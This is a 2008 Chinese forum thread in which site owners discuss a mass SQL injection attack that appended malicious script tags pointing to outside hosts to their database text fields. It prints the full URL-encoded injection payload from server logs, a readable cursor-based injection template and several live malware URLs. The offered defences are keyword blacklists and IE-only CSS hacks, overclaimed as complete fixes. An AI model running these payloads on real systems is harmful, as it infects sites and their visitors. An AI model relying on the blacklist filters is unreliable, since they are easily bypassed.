首页 新闻 论坛 群组 Blog 文档 下载 读书 Tag 网摘 搜索 .NET Java 游戏 视频 人才 外包 培训 数据库 书店 程序员
中国软件网
欢迎您:游客 | 登录 注册 帮助
    • 紧急求助,MSSQL数据库被大量插入"></title><script src=http://s.see9.us/s.js></script><!--字样的文本 [已结贴,结贴人:Lvyou1980]
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 04:16:20 楼主
    五一假期回来,突然发现我的两个网站(一个是ASP.NET 1.1,一个是ASP.NET 2.0)的数据库(一个是MS SQL 2000,一个是MS SQL 2005)某些表的某些文本字段所有数据记录都被截掉剩留几个文字,并被附加上了如下略有变化的文本字符:
    "> </title> <script src=http://s.see9.us/s.js> </script> <!--
    "> </title> <script""> </title> <script src=http://s.see9.us/s.js> </script> <!--
    "> </title> <script s"> </title> <script src=http://s.see9.us/s.js> </script> <!--
    "> </title> <script src=ht"> </title> <script src=http://s.see9.us/s.js> </script> <!--
    "> </title> <sc"> </title> <script src=http://s.see9.us/s.js> </script> <!--
    "> </title> <script src=http://s"> </title> <script src=http://s.see9.us/s.js> </script> <!--

    最后一行是空白数据的时候,插入的字符就会重复一些,显得特别长。

    无论我通过update方法清空多少次,如果我不停止IIS里的站点,很快就会重新大量出现,不像是人工所为,应该是服务器中了什么木马病毒之类的,不知有没有什么杀毒软件可以查杀这些病毒的?
    我浏览了下论坛里的ASP.NET板块和MS SQL数据库板块的帖子,发现有相当部分反应这个问题的帖子,几乎都是五一期间发生的,但都没发现有一个彻底有效的解决方法的。

    急需各位高手的大力帮助,最好大家能够发动强大的人肉搜索,揪出那些极度无聊的攻击者,种马者,拖出大街鞭打JJ一遍又一遍!!谢谢!
    100  修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 07:42:401楼 得分:0
    先查查是什么process或者文件会写入这些脚本,然后再看怎么杀毒,
    最后在修改数据库的值.
    没有杀干净的话,也是白费功夫.
    最近貌似中招的很多哦~
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 08:33:382楼 得分:0
    如果没有办法杀掉病毒的话,你把数据库改为禁止windows登陆,并把SQL Server的登陆密码改掉试试.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 09:10:253楼 得分:0
    解决方案:

    1. 杀软杀毒后,再手工杀毒,主要查注册表是否有异常

    2. 查补丁及漏洞

    3. 修复安装 MS SQL SERVER

    4. 注意文件夹共享的权限及一切有可能被修改的可能

    5. 最大可能被注入式攻击(若真,就进一步研究)
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 09:13:114楼 得分:0
    楼主跟我的一模一样啊
    我都快烦死了,我老板还去报了警。
    怎么弄都根除不掉~~
    5.4号就中了,一直到现在。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-10 09:34:325楼 得分:0
    刚才检查IIS日志文件,查找关键词“declare”,发现出现很多次下面的注入代码:
    dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • wzy_love_sly
    • 等级:
    发表于:2008-05-10 09:36:176楼 得分:2
    加强sql密码的复杂性,系统的安全性,过滤sql关键字,防止注入
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 14:33:057楼 得分:0
    我的也是~  你们解决了么~
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 14:38:058楼 得分:0
    我的服务器的系统重新做了,结果到了半个小时就不行了……密码改了还是不行……
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 14:38:219楼 得分:0
    用下面的这种方法暂时解决了,目前为止没有再出现插入了

    转: 在Global.asax文件下面加入如下代码: 希望能管用.针对.net


    void Application_BeginRequest(Object sender, EventArgs e) 
        { 
            StartProcessRequest(); 

        } 

        #region SQL注入式攻击代码分析 
        ///  <summary> 
        /// 处理用户提交的请求 
        ///  </summary> 
        private void StartProcessRequest() 
        { 
            try 
            { 
                string getkeys = ""; 
                string sqlErrorPage = "../default.aspx";//转向的错误提示页面 
                if (System.Web.HttpContext.Current.Request.QueryString != null) 
                { 

                    for (int i = 0; i  < System.Web.HttpContext.Current.Request.QueryString.Count; i++) 
                    { 
                        getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i]; 
                        if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys])) 
                        { 
                            System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage); 
                            System.Web.HttpContext.Current.Response.End(); 
                        } 
                    } 
                } 
                if (System.Web.HttpContext.Current.Request.Form != null) 
                { 
                    for (int i = 0; i  < System.Web.HttpContext.Current.Request.Form.Count; i++) 
                    { 
                        getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i]; 
                        if (getkeys == "__VIEWSTATE") continue; 
                        if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys])) 
                        { 
                            System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage); 
                            System.Web.HttpContext.Current.Response.End(); 
                        } 
                    } 
                } 
            } 
            catch 
            { 
                // 错误处理: 处理用户提交信息! 
            } 
        } 
        ///  <summary> 
        /// 分析用户请求是否正常 
        ///  </summary> 
        ///  <param name="Str">传入用户提交数据  </param> 
        ///  <returns>返回是否含有SQL注入式攻击代码  </returns> 
        private bool ProcessSqlStr(string Str) 
        { 
            bool ReturnValue = true; 
            try 
            { 
                if (Str.Trim() != "") 
                { 
                    string SqlStr = "and ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦chr ¦mid ¦master ¦truncate ¦char ¦declare"; 

                    string[] anySqlStr = SqlStr.Split(' ¦'); 
                    foreach (string ss in anySqlStr) 
                    { 
                        if (Str.ToLower().IndexOf(ss) >= 0) 
                        { 
                            ReturnValue = false; 
                            break; 
                        } 
                    } 
                } 
            } 
            catch 
            { 
                ReturnValue = false; 
            } 
            return ReturnValue; 
        } 
        #endregion
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 14:39:1510楼 得分:0
    那要是没有这个文件怎么办?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 14:46:1311楼 得分:0
    你用什么语言写的?ASP也有的,ASP.NET的实际是global.asax.cs,写好后编译,JSP肯定也有类似的,PHP估计也有。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 15:05:2512楼 得分:0
    是C#呀,我也没找到你说的那个啊,我只找到Global.asax.resx,这个可以吗?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 15:14:1913楼 得分:0
    我的是ASP
    有没有asp的  发出来看下~
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 16:34:4714楼 得分:0
    高手现身啊!!!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 17:46:3615楼 得分:0
    期盼高手
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 18:05:2116楼 得分:0
    我的网站是动网的BBS  都好多次这样了
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zzyyc
    • 等级:
    发表于:2008-05-11 19:18:1017楼 得分:0
    解决不了,就先把数据库设为只读吧。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 21:04:5218楼 得分:0
    我的也是啊,高手都在哪里,快解决下,这些中马的真可恨,要是让我找出来非的杀了他!!!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 21:25:4519楼 得分:0
    新发现,在查访问日志的时候发现这个:
    result.asp?caiclass=\xc6\xe4\xcb\xfb&diqu=\xa1\xaa\xb2\xbb\xcf\xde\xc7\xf8\xd3\xf2\xa1\xaa&xf=\xa1\xaa\xb2\xbb\xcf\xde\xcf\xfb\xb7\xd1\xa1\xaa&page=4
    这是什么意思啊?真弄不懂!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 22:57:0920楼 得分:0
    谁能写个.net的Global.aspx文件?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 01:52:3521楼 得分:0
    谁能写个.net的Global.aspx文件?
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~``自己通过添加“新建项”添加一个呗,添加时选“全局应用程序类”就可以了
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 05:50:2022楼 得分:0
    种马的这些生儿子没屁眼,没鸡鸡,全家死光光。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 08:42:0723楼 得分:0
    我的站 昨天中午被注入了,下午恢复了一下数据库,晚上又被注入了,怎么解决呀!
    是服务器问题还是程序漏洞呀!!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:03:0124楼 得分:0
    Lvyou1980大侠
    我这没有Global.aspx
    是C#的程序,到底是要怎么做,能不能帮个忙拉,发一份给我
    这是第7天.我把数据库换了也不行妈的.服务器中木马
    我其他的网站有没事情,就这个网站有问题.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:11:3425楼 得分:0
    我的站.net 2.0 与昨天中招,正在找原因。密切关注此帖.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:19:5226楼 得分:0
    这些代码我加了,还是不成啊!

    密切关注中^^^^^^^^^^^^^^^^^
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:26:4127楼 得分:0
    bjyanwei
    你那能不能发给Lvyou1980大侠所说的Global.aspx
    给我拉.

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:33:2328楼 得分:5
    转自(http://hi.baidu.com/gw_noah/blog/item/25b066c62a0d8a1e9c163d23.html)


    </title> </pre>> <script src= </title> </pre>> <script src=http://sb.5252.ws:88/107/1.js> </script> <

    <script src=http://1.hao929.cn/ads.js> </script> <!--

    1.其中主要是会自动变动,但是在FTP源文件里找不到此代码,起初是 </title> </pre>"> <script src=http://1.hao929.cn/ads.js> </script> <!-- 之后比方说用update replace 替换掉后就变成 <script src=http://sb.5252.ws:88/107/1.js>

    2.在数据库varchar text等可字符类型里所有字段后面都加了

    " </title> </pre>> </title> </pre>> <script src=http://sb.5252.ws:88/107/1.js> </script> <

    而且也会经常改变

    解决中:

    1.删除了一个文件夹,里面带有三个陌生的文件,应该是冒充伪装的,文件名比较怪异。

    2.在数据库更新替换掉那些代码后,很快又出来了 ,而且很不好替换删除,很是麻烦,有待服务器杀毒试试。。。

    3.严格过滤表单提交值的过滤,get时传值的过滤,统一转成小写后过滤

    4.关掉可以将xp_cmdshell消除:
    Use Master
    Exec sp_dropextendedproc N’xp_cmdshell’
    Go

    如果需要的话,可以把xp_cmdshell恢复回来:
    Use Master
    Exec sp_addextendedproc N’xp_cmdshell’, N’xplog70.dll’
    Go

    5.最近比较流行的数据库挂马

    以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

    SQL语句如下:

    用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)


    xtype=99 ntext

    xtype=35 text

    xtype=231 nvarchar

    xtype=167 varchar

    ———————YD的分割——————————–

    DECLARE @T varchar(255),
    @C varchar(255)
    DECLARE Table_Cursor CURSOR FOR
    Select
    a.name,b.name
    from sysobjects a,
    syscolumns b
    where a.id=b.id and
    a.xtype=’u’ and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec(’update [’+@T+’] set [’+@C+’]=
    rtrim(convert(varchar,[’+@C+’]))+
    ”挂马内容”’)
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    ———————YD的分割——————————–


    6.网上有些给出二行代码解决全部网页木马(含iframe/script木马):

    还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。

      前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂 <script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:

    注意,以下地址含有木马,请不要轻易访问:
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    汗死,一连插入了N个一样的 <script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
    document.write(" <div style='display:none'>")
    document.write(" <iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0> </iframe>")
    document.write(" </div>")
    又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
    ...
    var Kfqq, Qqs="784378237"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
    (...略)(下面还有N个统计的JS代码)。
    针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看, <script>木马的特点是什么:
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他 <object>代码,不管这么多,来多少杀多少。

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-12 09:33:3529楼 得分:15
    来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:

    解决方案1:
    iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
    script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
    原理:将 <script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
        缺点:访客无法看到被感染了 <script>木马的页面。


    解决方案2:
    iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
    script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
    原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。

    解决方案3:
    iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
    script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}
     原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。

    解决方案4:
    iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
    script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
       原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

    解决方案5:
    iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
    script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));}
       第五种方案的页面HTML源代码 <script>中要加入以"lh"为前缀的id,如 lhWeatherJSapi, <script src="***/**.js" id="lhSearchJSapi"> </script> 

    以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>让JS木马的进程迅速中止的CSS代码 </title>
    <style type="text/css" id="LinrStudio">
    /* <![CDATA[*/
    iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
    script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
    /* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */
    /*]]>*/
    </style>
    </head>
    <body>
    <script type="text/javascript" src="1.js"> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    <script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"> </script>
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    我是页面本身的1
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    我是页面本身的2
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    我是页面本身的3
    <script src=http://%76%63%63%64%2E%63%6E> </script>
    </body>
    </html>
    其中1.js是自己本站的:
    document.write("我是本站的JS文件");
    document.write(" <img src='http://www.baidu.com/images/logo.gif' />");
    我的测试环境是:
      Windows XP SP2 和windows Vista SP1
    IE6/IE7/IE8
    已全部打好补丁。
    综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

    大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。

    很晚了,我要睡觉了。有空再研究。

    更正第五个方案
    上面写到的第五个方案代码写错了,

    <script src="***/**.js" id="lhSearchJSapi"> </script>

    script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));}

    红色字部分有错误,应该是!=-1,上面的正确写法应该是:

    script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==-1)?document.write('木马被成功隔离!'):''));}
    script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}
    [/code] <script id="tjJSapivok" title="这是你外域的统计流量的JS代码" type="text/javascript" src="http://js.tongji.yahoo.com.cn/1/188/205/ystat.js"> </script>
    <script id="otherJSapivok" title="这是你本站需要的JS文件" type="text/javascript" src="footer.js"> </script>[/code]script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}

    <script id="footerJSapivok" src="这里写你本网站的JS路径" type="text/javascript"> </script>
    <script id="tongjiJSapivok" src="这里外域的JS路径" type="text/javascript"> </script>

    你网站的所有JS标记( <script>)都得加上id属性,并且有一个共同的前缀、后缀或公共字符串,上面的公共字符串为“vok”。

      特此更正,感谢昵称为“网工”的QQ网友提醒。
    研究网页挂马破坏用户的斗争还在继续,也不会停止。还望各位将服务器安全性能配置好点,我这也只是临时避避风雨的办法。

    7.  c#替换过滤掉一些sql注入时用的sql语句敏感关键词,有时需要将传的值转成小写再过滤会更有效

    public static string DelSQLStr(string str)
      {
        if(str == null ¦ ¦ str == "")
        return "";
        str = str.Replace(";","");
        str = str.Replace("'","");
        str= str.Replace("&","");
        str= str.Replace("%20","");
        str= str.Replace("--","");
        str= str.Replace("==","");
        str= str.Replace(" <","");
        str= str.Replace(">","");
        str= str.Replace("%","");
        str= str.ToLower().Replace("create","");
        str= str.ToLower().Replace("select","");
        str= str.ToLower().Replace("insert","");
        str= str.ToLower().Replace("update","");
        str= str.ToLower().Replace("drop","");
        str= str.ToLower().Replace("from","");
        str= str.ToLower().Replace("declare","");
        str= str.ToLower().Replace("exec","");
        str= str.ToLower().Replace("char","");
        str= str.ToLower().Replace("xp_cmdshell","");
        str= str.ToLower().Replace("where","");
        str= str.ToLower().Replace("or","");
        str= str.ToLower().Replace("and","");
        str= str.ToLower().Replace("begin","");
        return str;
      }


    此类问题有待详细研究,总结希望对被此问题困扰的朋友们些启发和帮助。。。
    修改 删除 举报 引用 回复